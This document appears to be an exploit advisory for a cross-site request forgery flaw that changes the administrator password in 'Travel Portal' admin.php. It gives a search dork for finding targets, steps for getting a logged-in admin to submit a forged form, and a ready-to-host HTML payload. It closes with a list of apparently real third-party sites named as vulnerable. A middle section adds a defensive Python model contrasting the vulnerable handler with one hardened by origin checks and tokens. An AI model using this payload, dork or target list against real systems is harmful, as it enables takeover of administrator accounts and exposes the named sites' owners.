
Travel Portal - Remote Admin Password Change CSRF

+++++++++++++++++++++++++++++++++++++++
# Exploit Title: Travel Portal - Remote Admin Password Change ( CSRF )
# Author : OmidKiller
# Dork : inurl:admin/admin.php intext:Travel Portal
# Tested On: Kali Linux / Ubuntu Linux / Firefox
# Date: 16/1/2017
+++++++++++++++++++++++++++++++++++++++
# PoC :
1. Search the dork and pick a target that exposes admin/admin.php.
2. Edit the action attribute of the form in the "CSRF" HTML below so it points at the target's admin/admin.php, host the page, and get a logged-in administrator to submit it. The browser attaches the admin's session cookie to the POST, and admin.php accepts the new password with no anti-CSRF token check.
Ex : <form method="post" action="http://www.sphider.eu/admin/admin.php">
+++++++++++++++++++++++++++++++++++++++
# CSRF :

<!-- CSRF PoC: replace target.com with the vulnerable host. The victim must be
     logged in to admin.php in the same browser when the form is submitted. -->
<html>
<head>
<title>Exploit By OmidKiller</title>
</head>
<body>
<h3>Travel Portal - Remote Admin Password Change</h3>
<form method="post" action="http://target.com/admin/admin.php">
<!-- admin_id=1 is the account named "admin" in the original PoC -->
<input type="hidden" name="admin_id" value="1">
<table>
<tr>
<td align="right">Admin Name:</td><td align="left">admin</td>
</tr>
<tr>
<td align="right">New Password:</td><td align="left"><input type="password" name="password" size="40" maxlength="40"></td>
</tr>
<tr>
<td></td><td><input type="submit" name="submit" value="Update Password"></td>
</tr>
</table>
</form>
</body>
</html>
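Why the form above works, and what a fix looks like, as an added example that is not code from the Travel Portal / admin.php application (that application is PHP; this is a Python model of its password-change handler). The session store, cookie name PHPSESSID, the csrf_token field, and the origins target.com / attacker.example are assumptions for illustration. The vulnerable handler accepts any POST that carries the victim's session cookie plus the three fields the PoC sends; the hardened one additionally requires the request's Origin/Referer to match the site and a per-session synchronizer token in the body, and binds the target account to the session instead of trusting admin_id.

```python
"""Model of admin.php's password-change handler: vulnerable vs hardened.

Added example, not the Travel Portal application's own code. Names, cookie
layout and origins are assumptions chosen for illustration.
"""
import hmac
import secrets
from dataclasses import dataclass
from urllib.parse import parse_qs, urlparse

SITE_ORIGIN = "http://target.com"            # where admin.php lives (from the PoC)
ATTACKER_ORIGIN = "http://attacker.example"  # assumed host of the CSRF page

# Assumed in-memory state: one logged-in admin session and the password table.
SESSIONS = {"s3ss10n": {"admin_id": 1, "csrf_token": secrets.token_hex(16)}}
PASSWORDS = {1: "original"}


@dataclass
class Request:
    headers: dict
    cookies: dict
    body: str  # application/x-www-form-urlencoded, exactly what the PoC form posts

    def form(self):
        return {k: v[0] for k, v in parse_qs(self.body).items()}


def vulnerable_admin_php(req):
    """Behaviour the advisory exploits: a valid session cookie is the only check."""
    sess = SESSIONS.get(req.cookies.get("PHPSESSID"))
    if sess is None:
        return 403, "not logged in"
    f = req.form()
    if f.get("submit") == "Update Password":
        PASSWORDS[int(f["admin_id"])] = f["password"]  # trusts admin_id from the body
        return 200, "password updated"
    return 200, "admin panel"


def hardened_admin_php(req):
    """Same handler with layered CSRF defences."""
    sess = SESSIONS.get(req.cookies.get("PHPSESSID"))
    if sess is None:
        return 403, "not logged in"
    # Layer 1: the browser sets Origin on cross-site POSTs and the attacker
    # cannot forge it, so a foreign origin is rejected outright. A missing
    # Origin/Referer is also rejected (strict policy; same-site form posts
    # from modern browsers always carry Origin).
    o = urlparse(req.headers.get("Origin") or req.headers.get("Referer", ""))
    if f"{o.scheme}://{o.netloc}" != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    # Layer 2: synchronizer token, tied to the session, compared in constant time.
    f = req.form()
    if not hmac.compare_digest(f.get("csrf_token", ""), sess["csrf_token"]):
        return 403, "missing or invalid CSRF token"
    # Bind the target account to the session instead of trusting admin_id.
    if f.get("admin_id") != str(sess["admin_id"]):
        return 403, "admin_id does not match session"
    if f.get("submit") == "Update Password":
        PASSWORDS[sess["admin_id"]] = f["password"]
        return 200, "password updated"
    return 200, "admin panel"


def csrf_request(password="pwned"):
    """What the victim's browser sends when it submits the advisory's form hosted
    on the attacker's page: session cookie attached, attacker Origin, no token."""
    return Request(headers={"Origin": ATTACKER_ORIGIN},
                   cookies={"PHPSESSID": "s3ss10n"},
                   body=f"admin_id=1&password={password}&submit=Update+Password")


def legitimate_request(password="newpass", with_token=True):
    """The same POST from the real admin page, which embeds the session token."""
    body = f"admin_id=1&password={password}&submit=Update+Password"
    if with_token:
        body += "&csrf_token=" + SESSIONS["s3ss10n"]["csrf_token"]
    return Request(headers={"Origin": SITE_ORIGIN},
                   cookies={"PHPSESSID": "s3ss10n"}, body=body)


def demo():
    """Run the cross-site POST against both handlers and report the outcome."""
    r = {}
    PASSWORDS[1] = "original"
    r["vuln_csrf"] = vulnerable_admin_php(csrf_request())[0]   # 200: password changed
    r["vuln_pw"] = PASSWORDS[1]                                 # "pwned"
    PASSWORDS[1] = "original"
    r["hard_csrf"] = hardened_admin_php(csrf_request())[0]     # 403: origin check
    r["hard_no_token"] = hardened_admin_php(legitimate_request(with_token=False))[0]  # 403
    r["hard_pw"] = PASSWORDS[1]                                 # still "original"
    r["hard_legit"] = hardened_admin_php(legitimate_request())[0]  # 200
    r["hard_legit_pw"] = PASSWORDS[1]                           # "newpass"
    return r


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

The Origin check alone is a cheap first filter; the token is what actually closes the hole, since Origin may be absent in some proxy or privacy configurations and a site that wants to allow those requests must then fall back to the token. Marking the session cookie SameSite=Lax would additionally stop the browser from attaching it to the cross-site POST in the first place.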

+++++++++++++++++++++++++++++++++++++++
# Demo

[+] http://www.adia.info/stat/admin/admin.php
[+] http://www.sphider.eu/admin/admin.php
[+] http://ruebennest.de/planetstat/admin/admin.php
[+] http://intern.orthopaedics.or.at/kalender/admin/admin.php
